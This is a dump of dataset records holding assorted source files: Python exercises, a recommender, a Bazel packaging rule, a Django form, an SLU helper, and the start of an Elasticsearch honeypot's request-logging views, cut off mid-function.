list\ncolor_list = [\"Red\",\"Green\",\"White\",\"Black\"]\nprint(color_list[0],color_list[3])\n\n# Use int \n\nn = input(\"enter a number: \")\n\nn1, n2, n3 = n,n*2,n*3\n\nprint(int(n1) + int(n2) + int(n3))\n\n \n\n\n\n","sub_path":"Excercise5.py","file_name":"Excercise5.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"295744124","text":"# Conditionals, Boolean expressions, relational operators\n\nfrom cs50 import get_int\n\n# Prompt user for integers\nx = get_int(\"What's x? \")\ny = get_int(\"What's y? \")\n\n# Compare integers\nif x < y:\n print(\"x is less than y\")\nelif x > y:\n print(\"x is greater than y\")\nelse:\n print(\"x is equal to y\")\n","sub_path":"6/src6/1/compare3.py","file_name":"compare3.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"324319908","text":"DATA_DIR = 'data/'\nOUT_DIR = 'out/'\nMIN_POPULARITY = 5\nUPDATE_CYCLE = '6H'\nHISTORY_NUM = 9\nTRAIN_START_DATE = '2016-10-3'\nTRAIN_END_DATE = '2016-10-23'\nTEST_START_DATE = '2016-10-24'\nTEST_END_DATE = '2016-10-30'\nBOUND = 200\nSIMILAR_VIDEO_NUMS = 10\nENCODE_MODEL = 'lstm'\nUSE_PAIRWISE_LOSS = 'yes'\nMAX_WORD_LEN_TITLE = 8\nMAX_WORD_LEN_TAGS = 4\nMAX_WORD_LEN_DESCRIPTION = 30\nCHAR_EMB_DIM = 300\nWORD_EMB_DIM = 200\n","sub_path":"parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"96663011","text":"import adv.adv_test\nfrom core.advbase import *\nfrom module.bleed import Bleed\nfrom slot.d import *\nfrom slot.a import *\n\ndef module():\n return Sazanka\n\nclass Sazanka(Adv):\n a3 = ('k_sleep', 0.20)\n\n conf = {}\n conf['slot.d'] = Shinobi()\n conf['slot.a'] = KFM()+CE()\n conf['acl'] = \"\"\"\n `s1\n `s3, fsc\n `s2, fsc\n `fs, seq=5\n \"\"\"\n conf['afflict_res.sleep'] = 80\n\n def prerun(this):\n this.bleed = Bleed(\"g_bleed\",0).reset()\n this.s2fscharge = 0\n\n def s1_proc(this, e):\n if random.random() < 0.8:\n Bleed(\"s1\", 1.32).on()\n\n def s2_proc(this, e):\n this.s2fscharge = 3\n\n def fs_proc(this, e):\n if this.s2fscharge > 0:\n this.s2fscharge -= 1\n this.dmg_make(\"o_fs_boost\",0.38)\n this.afflics.sleep('s2_fs', 100, 4.5)\n\n\n\nif __name__ == '__main__':\n conf = {}\n adv.adv_test.test(module(), conf, mass=1)\n","sub_path":"adv/sazanka.py","file_name":"sazanka.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"39990600","text":"class Parser:\n \"\"\"This class parse provided virtual machine command into its underlying field\"\"\"\n\n def __init__(self):\n \"\"\"Nothing to initialize\"\"\"\n pass\n\n\n def clean_line(self, line):\n \"\"\"Get rid of newline keys, comments, whitelines in any line and return it\"\"\"\n \n if \"//\" in line:\n line = line[:line.index(\"//\")]\n\n line = (line[:-1]).strip()\n return line\n\n\n def command_type(self, command):\n \"\"\"Provide the command type\"\"\"\n\n command = command.split()\n if len(command) == 1:\n if command[0] == \"return\":\n return \"C_RETURN\"\n else:\n return \"C_ARITHMETIC\"\n elif len(command) == 2:\n if command[0] == \"push\":\n return \"C_PUSH\"\n elif command[0] == \"pop\":\n return \"C_POP\"\n elif command[0] == \"label\":\n return \"C_LABEL\"\n elif command[0] == \"goto\":\n return \"C_GOTO\"\n elif command[0] == \"if-goto\":\n return \"C_IF\"\n elif len(command) == 3:\n if command[0] == \"function\":\n return \"C_FUNCTION\"\n elif command[0] == \"call\":\n return \"C_CALL\"\n \n\n def command_args(self, command):\n \"\"\"Return the command args\"\"\"\n\n return command.split()","sub_path":"08/VM_Translator/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"395820851","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 11 08:57:42 2018\n\n@author: s-long.bao\n\"\"\"\nimport pickle\nfrom torch import nn\nfrom torch import optim\nimport torch\nimport pyodbc\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport torch.utils.data\nimport torch.nn.functional as F\n\nfrom sklearn.utils import shuffle\nfrom keras.models import Model\nfrom keras.layers import Input, Embedding, Dot, Add, Flatten\nfrom keras.regularizers import l2\nfrom keras.optimizers import SGD, Adam\n\n\ncnxn = pyodbc.connect(\"Driver={SQL Server Native Client 11.0};\"\n \"Server=RSSVMKDB-CLUS;\"\n \"uid=readonly;pwd=readonly\")\n\n\nsql = \"\"\"\nSELECT OFFICE_CD,CLIENT_CD,A.DSCR_CD,COUNT(*) AS NUM\nFROM [dbo].[INVST_TRST_TRD] A\nLEFT JOIN INVST_TRUST_DESCRIPTION 銘柄\nON A.DSCR_CD = 銘柄.DSCR_CD\nLEFT OUTER JOIN xuser.dbo.ファンド分類_月次更新 分類\nON 銘柄.ISIN_CODE = 分類.ISINCODE\nWHERE TRADE_DT > '2014-01-01'\nAND COLLCT_ST_DT is null \nAND MATURITY_DT is null\nAND TRD_TYP_CD = 3\nAND REINVST_BUY_KBN = 0\nGROUP BY OFFICE_CD,CLIENT_CD,A.DSCR_CD\n\"\"\"\n\n# read data\ndf = pd.read_sql_query(sql=sql, \n con=cnxn)\ndf['CLIENT_ID'] = df['OFFICE_CD'].astype(str) + df['CLIENT_CD'].astype(str)\ndf = df[['CLIENT_ID','DSCR_CD', 'NUM']]\n\n# data proprecessing\nuser = set(df['CLIENT_ID'].values)\nitem = set(df['DSCR_CD'].values)\n\ndic_user = {}\ndic_item = {}\ndic_user2cd = {}\n\nfor i, item in enumerate(user):\n dic_user[item] = i\n \nfor i, item in enumerate(item):\n dic_item[item] = i\n \nfor i, item in dic_user.items():\n dic_user2cd[item] = i\n \n \ndf['CLIENT'] = df['CLIENT_ID'].apply(lambda x : dic_user[x])\ndf['FUND'] = df['DSCR_CD'].apply(lambda x : dic_item[x])\ndf['LOG_NUM'] = df['NUM'].apply(np.log)\n# parameters \nN = df['CLIENT'].max() + 1\nM = df['FUND'].max() + 1\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\ndf_train, df_test = train_test_split(df, test_size = 0.2, random_state = 0)\n\n# initialize variables\nK = 20# latent dimensionality\nmu = df_train.NUM.mean()\nepochs = 15\nreg = 0. # regularization penalty\n\n# model implementation\n# keras model\nu = Input(shape=(1,))\nm = Input(shape=(1,))\nu_embedding = Embedding(N, K, embeddings_regularizer=l2(reg))(u) # (N, 1, K)\nm_embedding = Embedding(M, K, embeddings_regularizer=l2(reg))(m) # (N, 1, K)\n\n# subsubmodel = Model([u, m], [u_embedding, m_embedding])\n# user_ids = df_train.userId.values[0:5]\n# movie_ids = df_train.movie_idx.values[0:5]\n# print(\"user_ids.shape\", user_ids.shape)\n# p = subsubmodel.predict([user_ids, movie_ids])\n# print(\"p[0].shape:\", p[0].shape)\n# print(\"p[1].shape:\", p[1].shape)\n# exit()\n\nu_bias = Embedding(N, 1, embeddings_regularizer=l2(reg))(u) # (N, 1, 1)\nm_bias = Embedding(M, 1, embeddings_regularizer=l2(reg))(m) # (N, 1, 1)\nx = Dot(axes=2)([u_embedding, m_embedding]) # (N, 1, 1)\n\n# submodel = Model([u, m], x)\n# user_ids = df_train.userId.values[0:5]\n# movie_ids = df_train.movie_idx.values[0:5]\n# p = submodel.predict([user_ids, movie_ids])\n# print(\"p.shape:\", p.shape)\n# exit()\n\nx = Add()([x, u_bias, m_bias])\nx = Flatten()(x) # (N, 1)\n\nmodel = Model(inputs=[u, m], outputs=x)\nmodel.compile(\n loss='mse',\n # optimizer='adam',\n # optimizer=Adam(lr=0.01),\n optimizer=SGD(lr=0.08, momentum=0.9),\n metrics=['mse'],\n)\n\nr = model.fit(\n x=[df_train.CLIENT.values, df_train.FUND.values],\n y=df_train.LOG_NUM.values - mu,\n epochs=epochs,\n batch_size=128,\n validation_data=(\n [df_test.CLIENT.values, df_test.FUND.values],\n df_test.LOG_NUM.values - mu\n )\n)\n \n# rec_sys implementation\nfrom sortedcontainers import SortedList\ndef rec(user, number = 10):\n rec = SortedList()\n for i,j in dic_item.items():\n score = model.predict([np.array(user).reshape(1,1),np.array(j).reshape(1,1)]) + mu\n rec.add((float(score), i))\n rec = list(reversed(rec))[:number]\n rec_list =[]\n for i, j in rec:\n rec_list.append(j)\n print(\"Recommnendations for OFFICE_CD = %d,CLIENT_CD = %d are following:\" % (int(dic_user2cd[user][:3]),int(dic_user2cd[user][3:])))\n print(rec_list)\n\n# save model and objects\n \nwith open('dic_item', 'wb') as f:\n pickle.dump(dic_item, f)\n\nwith open('dic_user', 'wb') as f:\n pickle.dump(dic_user, f)\n\nwith open('dic_user2cd', 'wb') as f:\n pickle.dump(dic_user2cd, f)\n\nwith open('model', 'wb') as f:\n pickle.dump(model, f)\n\nwith open('mu', 'wb') as f:\n pickle.dump(mu, f)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"DataScienceProject/4.Matrix_Factorization/src/rec_system_mf.py","file_name":"rec_system_mf.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"281637","text":"import logging\nimport queue\nimport threading\nimport time\nfrom contextlib import contextmanager\n\nlogger = logging.getLogger(__name__)\n\nDEFAULT_MAX_QUEUE_SIZE = 1000\nDEFAULT_UPDATE_INTERVAL_S = 1\n\n\n@contextmanager\ndef OpenReceivedPaymentsSubscriptionClient(\n squeak_db,\n initial_index,\n max_queue_size=DEFAULT_MAX_QUEUE_SIZE,\n update_interval_s=DEFAULT_UPDATE_INTERVAL_S,\n):\n \"\"\"Custom context manager for opening a received payments client.\"\"\"\n\n # f = open(filename, method)\n client = ReceivedPaymentsSubscriptionClient(\n squeak_db,\n initial_index,\n max_queue_size,\n update_interval_s,\n )\n client.start()\n try:\n # yield f\n yield client\n\n finally:\n # f.close()\n client.stop()\n\n\nclass ReceivedPaymentsSubscriptionClient:\n def __init__(\n self,\n squeak_db,\n initial_index,\n max_queue_size=DEFAULT_MAX_QUEUE_SIZE,\n update_interval_s=DEFAULT_UPDATE_INTERVAL_S,\n ):\n self.squeak_db = squeak_db\n self.initial_index = initial_index\n self.update_interval_s = update_interval_s\n self._queue = queue.Queue(max_queue_size)\n self._stopped = threading.Event()\n\n @property\n def queue(self):\n return self._queue\n\n def start(self):\n logger.info(\"Starting received payments subscription client...\")\n populate_queue_thread = threading.Thread(\n target=self._populate_queue,\n args=(),\n )\n populate_queue_thread.start()\n\n def stop(self):\n logger.info(\"Stopping received payments subscription client...\")\n self._stopped.set()\n\n def _populate_queue(self):\n payment_index = self.initial_index\n while not self._stopped.is_set():\n for payment in self._get_received_payments_from_db(payment_index):\n self._queue.put(payment)\n payment_index = payment.received_payment_id\n logger.info(\n \"Added payment to queue. Size: {}\".format(\n self._queue.qsize())\n )\n time.sleep(self.update_interval_s)\n\n def _get_received_payments_from_db(self, payment_index):\n return self.squeak_db.yield_received_payments_from_index(payment_index)\n\n def get_received_payments(self):\n while True:\n payment = self._queue.get()\n yield payment\n self._queue.task_done()\n logger.info(\n \"Removed payment from queue. Size: {}\".format(\n self._queue.qsize())\n )\n","sub_path":"squeaknode/node/received_payments_subscription_client.py","file_name":"received_payments_subscription_client.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"511248217","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\n\nLOCAL_JDK_PREFIX = \"external/local_jdk/\"\nMAVEN_COORDINATES_PREFIX = \"maven_coordinates=\"\n\n# mapping of single JAR to its Maven coordinates\nJarToMavenCoordinatesMapping = provider(\n fields = {\n \"filename\": \"jar filename\",\n \"maven_coordinates\" : \"Maven coordinates of the jar\"\n },\n)\n\n# mapping of all JARs to their Maven coordinates\nTransitiveJarToMavenCoordinatesMapping = provider(\n fields = {\n 'mapping': 'maps jar filename to coordinates'\n }\n)\n\ndef _transitive_collect_maven_coordinate_impl(_target, ctx):\n mapping = {}\n\n if JarToMavenCoordinatesMapping in _target:\n mapping[_target[JarToMavenCoordinatesMapping].filename] = _target[\n JarToMavenCoordinatesMapping].maven_coordinates\n\n for dep in getattr(ctx.rule.attr, \"jars\", []):\n if TransitiveJarToMavenCoordinatesMapping in dep:\n mapping.update(dep[TransitiveJarToMavenCoordinatesMapping].mapping)\n for dep in getattr(ctx.rule.attr, \"deps\", []):\n if TransitiveJarToMavenCoordinatesMapping in dep:\n mapping.update(dep[TransitiveJarToMavenCoordinatesMapping].mapping)\n for dep in getattr(ctx.rule.attr, \"exports\", []):\n if TransitiveJarToMavenCoordinatesMapping in dep:\n mapping.update(dep[TransitiveJarToMavenCoordinatesMapping].mapping)\n for dep in getattr(ctx.rule.attr, \"runtime_deps\", []):\n if TransitiveJarToMavenCoordinatesMapping in dep:\n mapping.update(dep[TransitiveJarToMavenCoordinatesMapping].mapping)\n\n # don't store jars with no attached Maven coordinates\n cleaned_mapping = {k: v for k,v in mapping.items() if v}\n return [TransitiveJarToMavenCoordinatesMapping(mapping = cleaned_mapping)]\n\n\ndef _collect_maven_coordinate_impl(_target, ctx):\n for file in _target.files.to_list():\n if file.extension == 'jar':\n jar_file = file.path\n\n tags = getattr(ctx.rule.attr, \"tags\", [])\n jar_coordinates = \"\"\n\n for tag in tags:\n if tag.startswith(MAVEN_COORDINATES_PREFIX):\n jar_coordinates = tag[len(MAVEN_COORDINATES_PREFIX):]\n\n return [JarToMavenCoordinatesMapping(\n filename = jar_file,\n maven_coordinates = jar_coordinates\n )]\n\n\n_collect_maven_coordinate = aspect(\n attr_aspects = [\n \"jars\",\n \"deps\",\n \"exports\",\n \"runtime_deps\"\n ],\n doc = \"\"\"\n Collects the Maven information for targets, their dependencies, and their transitive exports.\n \"\"\",\n implementation = _collect_maven_coordinate_impl,\n provides = [JarToMavenCoordinatesMapping]\n)\n\n\n_transitive_collect_maven_coordinate = aspect(\n attr_aspects = [\n \"jars\",\n \"deps\",\n \"exports\",\n \"runtime_deps\"\n ],\n required_aspect_providers = [JarToMavenCoordinatesMapping],\n provides = [TransitiveJarToMavenCoordinatesMapping],\n implementation = _transitive_collect_maven_coordinate_impl\n)\n\n\ndef _java_deps_impl(ctx):\n names = {}\n files = []\n filenames = []\n outputPathOverrides = ctx.attr.java_deps_root_overrides\n\n mapping = ctx.attr.target[TransitiveJarToMavenCoordinatesMapping].mapping\n\n for file in ctx.attr.target.data_runfiles.files.to_list() + ctx.attr.target.files.to_list():\n if file.extension == 'jar' and not file.path.startswith(LOCAL_JDK_PREFIX):\n if ctx.attr.maven_name and file.path not in mapping:\n fail(\"{} does not have associated Maven coordinate\".format(file.owner))\n filename = mapping.get(file.path, file.basename).replace('.', '-').replace(':', '-')\n if filename in filenames:\n print(\"Excluded duplicate: {}\".format(filename))\n continue # do not pack JARs with same name\n for jarPattern in outputPathOverrides:\n if file.basename == jarPattern or (jarPattern.endswith(\"*\") and file.basename.startswith(jarPattern.rstrip(\"*\"))):\n names[file.path] = outputPathOverrides[jarPattern] + filename + \".jar\"\n break\n if file.path not in names:\n names[file.path] = ctx.attr.java_deps_root + filename + \".jar\"\n files.append(file)\n filenames.append(filename)\n\n jars_mapping = ctx.actions.declare_file(\"{}_jars.mapping\".format(ctx.attr.target.label.name))\n\n ctx.actions.write(\n output = jars_mapping,\n content = str(names)\n )\n\n if not ctx.attr.version_file:\n version_file = ctx.actions.declare_file(ctx.attr.name + \"__do_not_reference.version\")\n version = ctx.var.get('version', '0.0.0')\n\n ctx.actions.run_shell(\n inputs = [],\n outputs = [version_file],\n command = \"echo {} > {}\".format(version, version_file.path)\n )\n else:\n version_file = ctx.file.version_file\n\n ctx.actions.run(\n outputs = [ctx.outputs.distribution],\n inputs = files + [jars_mapping, version_file],\n arguments = [jars_mapping.path, ctx.outputs.distribution.path, version_file.path],\n executable = ctx.executable._java_deps_builder,\n progress_message = \"Generating tarball with Java deps: {}\".format(\n ctx.outputs.distribution.short_path)\n )\n\n\njava_deps = rule(\n attrs = {\n \"target\": attr.label(\n mandatory=True,\n aspects = [\n _collect_maven_coordinate,\n _transitive_collect_maven_coordinate\n ],\n doc = \"Java target to pack into archive\"\n ),\n \"java_deps_root\": attr.string(\n doc = \"Folder inside archive to put JARs into\"\n ),\n \"java_deps_root_overrides\": attr.string_dict(\n doc = \"\"\"\n JARs with filenames matching the given patterns will be placed into the specified folders inside the archive,\n instead of the default folder. Patterns can be either the full name of a JAR, or a prefix followed by a '*'.\n \"\"\"\n ),\n \"version_file\": attr.label(\n allow_single_file = True,\n doc = \"\"\"\n File containing version string.\n Alternatively, pass --define version=VERSION to Bazel invocation.\n Not specifying version at all defaults to '0.0.0'\n \"\"\"\n ),\n \"maven_name\": attr.bool(\n doc = \"Name JAR files inside archive based on Maven coordinates\",\n default = False,\n ),\n \"_java_deps_builder\": attr.label(\n default = \"//common:java_deps\",\n executable = True,\n cfg = \"host\"\n )\n },\n implementation = _java_deps_impl,\n outputs = {\n \"distribution\": \"%{name}.tgz\"\n },\n doc = \"Packs Java library alongside with its dependencies into archive\"\n)\n","sub_path":"common/java_deps.bzl","file_name":"java_deps.bzl","file_ext":"bzl","file_size_in_byte":7532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"156100258","text":"from .models import Collect\nfrom django.forms import ModelForm, HiddenInput\nfrom django.core.validators import ValidationError\n\n\nclass YelpForm(ModelForm):\n\n class Meta:\n model = Collect\n widgets = {'business_name': HiddenInput(), 'slug': HiddenInput()}\n fields = ['link', 'page_amount', 'business_name', 'slug']\n labels = {'link': 'Yelp Link', 'scrape_date': 'Date Scraped',\n 'slug': 'Slug'}\n\n def __init__(self, *args, **kwargs):\n self.results = None\n super(YelpForm, self).__init__(*args, **kwargs)\n\n def clean_link(self):\n link = self.cleaned_data.get('link')\n link = str(link)\n valid_link = ['https', 'http', 'www.']\n if not link:\n raise ValidationError('Enter a valid yelp link!')\n elif not link.startswith(tuple(valid_link)):\n raise ValidationError('Enter a valid yelp link!')\n elif 'www.yelp.com' not in link:\n raise ValidationError('Enter a valid yelp link!')\n else:\n return link\n\n\n","sub_path":"scrape/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"116034776","text":"\"\"\"\n=====================================================================================\n\n Module: Logger\n\n Version: 1.0 January 2020\n Revision: 1\n\n Authors: Paulo Vasconcelos, Pedro Teixeira\n Organization: University of Aveiro\n\n=====================================================================================\n\"\"\"\n\n\nimport sys\n\ndef log(topic, message, aspect):\n\tif(aspect==\"violet\"):\n\t\tprint(f\"{bcolors.VIOLET}\",end='')\n\telif(aspect==\"blue\"):\n\t\tprint(f\"{bcolors.BLUE}\",end='')\n\telif(aspect==\"green\"):\n\t\tprint(f\"{bcolors.GREEN}\",end='')\n\telif(aspect==\"yellow\"):\n\t\tprint(f\"{bcolors.YELLOW}\",end='')\n\telif(aspect==\"red\"):\n\t\tprint(f\"{bcolors.RED}\",end='')\n\telif(aspect==\"bold\"):\n\t\tprint(f\"{bcolors.BOLD}\",end='')\n\telif(aspect==\"underline\"):\n\t\tprint(f\"{bcolors.UNDERLINE}\",end='')\n\tprint(\"[{0}] {1}{2}\".format(topic,message,bcolors.ENDC))\n\nclass bcolors:\n VIOLET = '\\033[95m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n RED = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'","sub_path":"security/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"629341812","text":"\"\"\"\n\nslu helper module\n\n@author: WL\n@date: 2018/12/3\n\n\"\"\"\n\nimport os\nimport pickle\nimport numpy as np\nimport random\nimport torch\nfrom config import config\n\nDATA_DIR = \"data/atis\"\n\n\ndef load_raw_data(file):\n \"\"\"\n load raw data\n Args:\n file: raw data file path\n Returns:\n\n \"\"\"\n with open(file, 'rb') as stream:\n ds, dicts = pickle.load(stream)\n print('Done loading: ', file)\n print(' samples: {:4d}'.format(len(ds['query'])))\n\n query, slots, intent = map(ds.get, ['query', 'slot_labels', 'intent_labels'])\n query = list(map(lambda x: list(map(lambda xx: xx+1, x)), query))\n slots = list(map(lambda x: list(map(lambda xx: xx+1, x)), slots))\n data = list(zip(query, slots, intent))\n return np.array(data), dicts\n\n\ndef _batch(data):\n \"\"\"\n upzip data and padding data\n Args:\n data: [(query, slots, intent),...,()]\n\n Returns:\n data: [query1, query2, ... ], [slots1, slots2, ....], [intent1, intent2, ...], [...]\n\n \"\"\"\n\n query, slots, intent = zip(*data)\n # TODO:if there are two intent for one query, this op is no proper\n intent = list(map(lambda x: x[0], intent))\n seq_len = list(map(len, query))\n max_len = max(seq_len)\n for i in range(len(query)):\n if len(query[i]) < max_len:\n query[i].extend([config.padding_idx] * (max_len - len(query[i])))\n slots[i].extend([config.padding_idx] * (max_len - len(slots[i])))\n return \\\n torch.Tensor(query).long(), \\\n torch.Tensor(slots).long(), \\\n torch.Tensor(intent).long(), \\\n torch.Tensor(seq_len).long()\n\n\ndef get_batch(data, shuffle=True):\n \"\"\"\n\n Args:\n data: raw data\n shuffle: shuffle or not\n\n Returns:\n batch data\n \"\"\"\n\n if shuffle:\n random.shuffle(data)\n sindex, eindex = 0, config.batch_size\n while eindex < len(data):\n batch = data[sindex:eindex]\n tmp = eindex\n eindex = eindex + config.batch_size\n sindex = tmp\n\n yield _batch(batch)\n\n if eindex >= len(data):\n batch = data[sindex:]\n yield _batch(batch)\n\n\ndef evaluate(prob_intent, prob_slots, intent, slots):\n \"\"\"\n calculate accuracy of intent and slots\n Args:\n prob_intent: probability of intent, size: B * intent_class_size\n prob_slots: probability of slots, size: B * seq_len * slot_size\n intent: intent label, size: B\n slots: slots label, size: B * seq_len\n\n Returns:\n accuracy_intent: acc of intent\n accuracy_slots: acc of slots\n \"\"\"\n\n # for intent\n pred_intent = torch.argmax(prob_intent, dim=1)\n accuracy_intent = torch.sum(pred_intent == intent).data.item() / pred_intent.size(0)\n\n # slots\n pred_slots = torch.argmax(prob_slots, dim=2)\n accuracy_slots = torch.sum(pred_slots == slots).data.item() / (pred_slots.size(0) * pred_slots.size(1))\n\n return accuracy_intent, accuracy_slots\n\n\ndef print_class_name(name):\n def deco(func):\n def wrapper():\n print(\"=\" * 10, name, \"=\" * 10)\n func()\n print(\"=\" * 10, name, \"=\" * 10)\n return wrapper\n return deco\n\n\nif __name__ == \"__main__\":\n\n intent = torch.Tensor([1, 2, 2]).long()\n slots = torch.Tensor([[1, 2, 2], [3, 2, 0]]).long()\n # [1, 1, 2] 0.67\n prob_intent = torch.Tensor([[0.5, 0.6, 0.4], [0.1, 0.2, 0.1], [0.1, 0.2, 0.4]])\n # [1, 1, 2], [1, 1, 0] 0.5\n prob_slots = torch.Tensor([[[0.5, 0.6, 0.4], [0.1, 0.2, 0.1], [0.1, 0.2, 0.4]],\n [[0.5, 0.6, 0.4], [0.1, 0.2, 0.1], [0.5, 0.2, 0.1]]])\n acc_intent, acc_slots = evaluate(prob_intent, prob_slots, intent, slots)\n\n print(\" Expect Acc is {:4f} and {:4f}\".format(0.67, 0.5))\n print(\"while real Acc is {:4f} and {:4f}\".format(acc_intent, acc_slots))\n\n train_data, dicts = load_raw_data(os.path.join(DATA_DIR, 'atis.train.pkl'))\n batch = get_batch(train_data)\n query, slots, intent, seq_len = next(batch)\n print(query[:2])\n print(slots[:2])\n print(intent[:2])\n","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"196064731","text":"import cPickle as pickle\nfrom global_module.settings_module import set_dir\n\nrel_dir = set_dir.Directory('TR')\n\n\ndef convert(test_filename):\n label_dict = pickle.load(open(rel_dir.label_map_dict, 'rb'))\n test_file = open(test_filename, 'r')\n op_file = open(test_filename + '_output.txt', 'w')\n\n new_map = {}\n\n for actual_id, mapped_id in label_dict.iteritems():\n new_map[mapped_id] = actual_id\n\n for line in test_file:\n line = line.strip()\n op_file.write(new_map[int(line) - 1] + '\\n')\n\n op_file.close()\n test_file.close()\n\n # convert('/home/aykumar/aykumar_home/self/deep-text-classifier/global_module/utility_dir/folder1/output/dummy_rnn.txt')\n","sub_path":"global_module/utility_code/convert_pred_to_class.py","file_name":"convert_pred_to_class.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"564438568","text":"import datetime\nimport logging\nimport random\nfrom shapely import geometry\n\nfrom google.appengine.ext import ndb\n\nfrom dancedeets.events import eventdata\n\nMAX_OBJECTS = 100\n\n\nclass FeaturedResult(ndb.Model):\n event_id = ndb.StringProperty()\n json_props = ndb.JsonProperty(indexed=False)\n\n @property\n def polygon(self):\n return geometry.Polygon(self.json_props['polygon'])\n\n @property\n def showTitle(self):\n return self.json_props.get('showTitle', True) == True\n\n @property\n def promotionText(self):\n return self.json_props.get('promotionText', None)\n\n @property\n def manualImage(self):\n return self.json_props.get('manualImage', False)\n\n\ndef get_featured_events_for(southwest, northeast):\n\n if not southwest or not northeast:\n testing_featured_results_offline = False\n if testing_featured_results_offline:\n relevant_featured = FeaturedResult.query().fetch(MAX_OBJECTS)\n else:\n relevant_featured = []\n else:\n featured_results = FeaturedResult.query().fetch(MAX_OBJECTS)\n search_polygon = geometry.Polygon([\n # lat (y), long (x)\n (southwest[0], southwest[1]),\n (southwest[0], northeast[1]),\n (northeast[0], northeast[1]),\n (northeast[0], southwest[1]),\n ])\n relevant_featured = [x for x in featured_results if search_polygon.intersects(x.polygon)]\n random.shuffle(relevant_featured)\n\n featured_events = eventdata.DBEvent.get_by_ids([x.event_id for x in relevant_featured])\n featured_infos = []\n for featured_result, featured_event in zip(relevant_featured, featured_events):\n if featured_event.is_past():\n logging.info('Discarding featured event in the past: %s', featured_event.id)\n continue\n featured_infos.append({\n 'event': featured_event,\n 'showTitle': featured_result.showTitle,\n 'promotionText': featured_result.promotionText,\n 'manualImage': featured_result.manualImage,\n })\n return featured_infos\n","sub_path":"server/dancedeets/events/featured.py","file_name":"featured.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"271387016","text":"from bottle import route, request, response, error, hook\nimport os\nimport base64\nimport datetime\nimport logging\n\nlogger = logging.getLogger(\"elasticpot.views\")\n\ntemplate_folder = os.path.join(os.path.dirname(__file__), 'templates')\n\n\n@hook('before_request')\ndef logData():\n querystring = request.path\n if request.query_string:\n querystring += '?' + request.query_string\n\n headers = '\\n'.join(\n ': '.join((h, request.headers[h])) for h in request.headers\n )\n\n body = ''\n if request.method in ('POST', 'PUT'):\n body = ''.join(chunk.decode('utf-8') for chunk in request.body)\n\n full_request = ''.join((\n request.method,\n ' ',\n querystring,\n ' ',\n request.environ.get('SERVER_PROTOCOL', 'HTTP/1.0'),\n '\\n',\n headers,\n '\\n\\n',\n body\n ))\n\n # base64 encode\n raw = base64.b64encode(full_request.encode('utf-8')).decode('ascii')\n\n curDate = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S')\n data = {}\n data['timestamp'] = curDate\n data['src_ip'] = request.environ.get('REMOTE_ADDR')\n data['src_port'] = request.environ.get('REMOTE_PORT', 44927)\n data['dest_ip'] = request.app.config['main']['ip']\n data['dest_port'] = request.environ['SERVER_PORT']\n\n data['method'] = request.method\n data['querystring'] = querystring\n data['headers'] = headers\n data['body'] = body\n data['request'] = full_request\n data['raw'] = raw\n\n request.app.outputs.send(data)\n\n\n# Handle index site\n@route('/', method='GET')\ndef index():\n logger.info(\"Scanned (/)\")\n\n response.content_type = 'application/json'\n\n with open(os.path.join(template_folder, 'index.txt')) as fp:\n return fp.read()\n\n\n# handle irrelevant / error requests\n@error(404)\ndef error404(error):\n logger.info(\"Access to non existing resource: \" + request.url)\n\n response.content_type = 'application/json'\n\n with open(os.path.join(template_folder, '404.txt')) as fp:\n return fp.read()\n\n\n# handle favicon\n@route('/favicon.ico', method='GET')\ndef favicon():\n with open(os.path.join(template_folder, 'favicon.ico.txt')) as fp:\n return fp.read()\n\n\n# handle route to indices\n@route('/_cat/indices', method='GET')\ndef getindeces():\n 